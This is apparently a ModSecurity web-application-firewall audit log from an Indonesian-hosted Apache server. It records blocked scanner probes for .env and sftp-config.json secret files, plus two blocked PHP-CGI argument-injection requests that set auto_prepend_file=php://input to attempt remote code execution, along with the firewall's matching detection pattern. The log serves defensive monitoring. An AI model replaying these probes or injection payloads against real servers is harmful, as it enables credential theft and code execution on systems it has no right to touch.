Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744853078359651 882 (- - -)
Stopwatch2: 1744853078359651 882; combined=380, p1=332, p2=0, p3=0, p4=0, p5=48, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fb2b6d6e-Z--
--efc23714-A--
[17/Apr/2025:08:24:40 +0700] aABYWJttSyr0uJld9k4dWwAAANY 103.236.140.4 56912 103.236.140.4 8181
--efc23714-B--
GET /api/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--efc23714-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--efc23714-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744853080159538 809 (- - -)
Stopwatch2: 1744853080159538 809; combined=328, p1=284, p2=0, p3=0, p4=0, p5=44, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--efc23714-Z--
--9078df13-A--
[17/Apr/2025:08:24:41 +0700] aABYWSdHtgGT4CGaO0h-zwAAAFg 103.236.140.4 56914 103.236.140.4 8181
--9078df13-B--
GET /.env.save HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--9078df13-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9078df13-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744853081968370 772 (- - -)
Stopwatch2: 1744853081968370 772; combined=315, p1=270, p2=0, p3=0, p4=0, p5=45, sr=110, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9078df13-Z--
--dca35a62-A--
[17/Apr/2025:08:24:43 +0700] aABYWydHtgGT4CGaO0h-0AAAAEI 103.236.140.4 56916 103.236.140.4 8181
--dca35a62-B--
GET /.env.prod HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--dca35a62-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dca35a62-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744853083648189 883 (- - -)
Stopwatch2: 1744853083648189 883; combined=328, p1=275, p2=0, p3=0, p4=0, p5=53, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dca35a62-Z--
--02d49612-A--
[17/Apr/2025:08:24:57 +0700] aABYaSdHtgGT4CGaO0h-1gAAAEw 103.236.140.4 56934 103.236.140.4 8181
--02d49612-B--
GET /dev/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--02d49612-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--02d49612-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744853097453326 759 (- - -)
Stopwatch2: 1744853097453326 759; combined=311, p1=278, p2=0, p3=0, p4=0, p5=33, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--02d49612-Z--
--922d7a65-A--
[17/Apr/2025:08:24:58 +0700] aABYaidHtgGT4CGaO0h-1wAAAEg 103.236.140.4 56936 103.236.140.4 8181
--922d7a65-B--
GET /application/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--922d7a65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--922d7a65-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744853098646760 650 (- - -)
Stopwatch2: 1744853098646760 650; combined=248, p1=222, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--922d7a65-Z--
--243c526c-A--
[17/Apr/2025:11:06:16 +0700] aAB-OJttSyr0uJld9k4q1gAAANg 103.236.140.4 41042 103.236.140.4 8181
--243c526c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.2.594 (beta) Yowser/2.5 Safari/537.36
Accept-Charset: utf-8
--243c526c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--243c526c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744862776539810 781 (- - -)
Stopwatch2: 1744862776539810 781; combined=374, p1=334, p2=0, p3=0, p4=0, p5=39, sr=139, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--243c526c-Z--
--5780450d-A--
[17/Apr/2025:13:04:46 +0700] aACZ_t9Bm7jS0aoVS7Lo6gAAAIk 103.236.140.4 34994 103.236.140.4 8181
--5780450d-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.141.38
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.141.38
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.25.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
--5780450d-C--
--5780450d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5780450d-E--
--5780450d-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744869886496014 4305 (- - -)
Stopwatch2: 1744869886496014 4305; combined=2840, p1=497, p2=2313, p3=0, p4=0, p5=30, sr=105, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5780450d-Z--
--64975614-A--
[17/Apr/2025:17:07:37 +0700] aADS6ZttSyr0uJld9k6oUAAAANc 103.236.140.4 48808 103.236.140.4 8181
--64975614-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.190
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.190
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--64975614-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--64975614-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744884457211639 829 (- - -)
Stopwatch2: 1744884457211639 829; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--64975614-Z--
--816a585d-A--
[17/Apr/2025:17:07:40 +0700] aADS7CdHtgGT4CGaO0jxOgAAAEk 103.236.140.4 48824 103.236.140.4 8181
--816a585d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.190
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.190
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--816a585d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--816a585d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744884460125428 700 (- - -)
Stopwatch2: 1744884460125428 700; combined=266, p1=228, p2=0, p3=0, p4=0, p5=37, sr=68, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--816a585d-Z--
--b6fe030e-A--
[17/Apr/2025:17:44:37 +0700] aADblSdHtgGT4CGaO0j0uwAAAEM 103.236.140.4 34624 103.236.140.4 8181
--b6fe030e-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 124.115.231.142
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 124.115.231.142
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--b6fe030e-C--
--b6fe030e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b6fe030e-E--
--b6fe030e-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744886677134838 4989 (- - -)
Stopwatch2: 1744886677134838 4989; combined=3678, p1=534, p2=3109, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b6fe030e-Z--
--908cca21-A--
[17/Apr/2025:18:10:04 +0700] aADhjCdHtgGT4CGaO0j2NwAAAEk 103.236.140.4 40214 103.236.140.4 8181
--908cca21-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.108.196
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.108.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--908cca21-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--908cca21-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744888204649937 799 (- - -)
Stopwatch2: 1744888204649937 799; combined=356, p1=321, p2=0, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--908cca21-Z--
--03a1930f-A--
[17/Apr/2025:18:58:37 +0700] aADs7d9Bm7jS0aoVS7I2xAAAAIk 103.236.140.4 38886 103.236.140.4 8181
--03a1930f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.190
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.190
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--03a1930f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--03a1930f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744891117628937 788 (- - -)
Stopwatch2: 1744891117628937 788; combined=303, p1=267, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--03a1930f-Z--
--29c79f0c-A--
[17/Apr/2025:18:58:42 +0700] aADs8j2cuLCXMl1vWbCRdwAAAAo 103.236.140.4 38906 103.236.140.4 8181
--29c79f0c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.190
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.190
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--29c79f0c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--29c79f0c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744891122416030 906 (- - -)
Stopwatch2: 1744891122416030 906; combined=423, p1=380, p2=0, p3=0, p4=0, p5=43, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--29c79f0c-Z--
--1a2cef19-A--
[17/Apr/2025:19:19:42 +0700] aADx3j2cuLCXMl1vWbCSyQAAABg 103.236.140.4 43456 103.236.140.4 8181
--1a2cef19-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 8.222.147.167
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 8.222.147.167
X-Forwarded-Proto: https
Connection: close
Content-Length: 28
content-type: application/dns-message
accept: application/dns-message
user-agent: Chrome
--1a2cef19-C--
9 googlecom
--1a2cef19-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1a2cef19-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744892382505929 4215 (- - -)
Stopwatch2: 1744892382505929 4215; combined=2651, p1=556, p2=1998, p3=31, p4=34, p5=32, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1a2cef19-Z--
--7a0c0d4d-A--
[17/Apr/2025:20:02:39 +0700] aAD77ydHtgGT4CGaO0gF-AAAAFA 103.236.140.4 54414 103.236.140.4 8181
--7a0c0d4d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 209.141.45.70
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 209.141.45.70
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--7a0c0d4d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7a0c0d4d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744894959489953 714 (- - -)
Stopwatch2: 1744894959489953 714; combined=274, p1=236, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7a0c0d4d-Z--
--2e3a5b4c-A--
[17/Apr/2025:20:46:41 +0700] aAEGQSdHtgGT4CGaO0gIWQAAAEs 103.236.140.4 35716 103.236.140.4 8181
--2e3a5b4c-B--
GET /sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 89.21.85.27
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 89.21.85.27
X-Forwarded-Proto: http
Connection: close
User-Agent: python-requests/2.32.3
Accept: */*
--2e3a5b4c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e3a5b4c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744897601958816 882 (- - -)
Stopwatch2: 1744897601958816 882; combined=335, p1=294, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e3a5b4c-Z--
--e292171c-A--
[18/Apr/2025:00:06:24 +0700] aAE1ED2cuLCXMl1vWbCoXgAAAAw 103.236.140.4 55530 103.236.140.4 8181
--e292171c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.190
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.190
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--e292171c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e292171c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744909584001646 785 (- - -)
Stopwatch2: 1744909584001646 785; combined=357, p1=316, p2=0, p3=0, p4=0, p5=41, sr=117, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e292171c-Z--
--08bbd451-A--
[18/Apr/2025:00:06:27 +0700] aAE1E5ttSyr0uJld9k7KfgAAAMQ 103.236.140.4 55546 103.236.140.4 8181
--08bbd451-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.190
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.190
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--08bbd451-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--08bbd451-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744909587455744 810 (- - -)
Stopwatch2: 1744909587455744 810; combined=335, p1=280, p2=0, p3=0, p4=0, p5=55, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--08bbd451-Z--
--f69b4716-A--
[18/Apr/2025:01:25:50 +0700] aAFHrt9Bm7jS0aoVS7JOwgAAAIg 103.236.140.4 50624 103.236.140.4 8181
--f69b4716-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.69.197
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.69.197
X-Forwarded-Proto: https
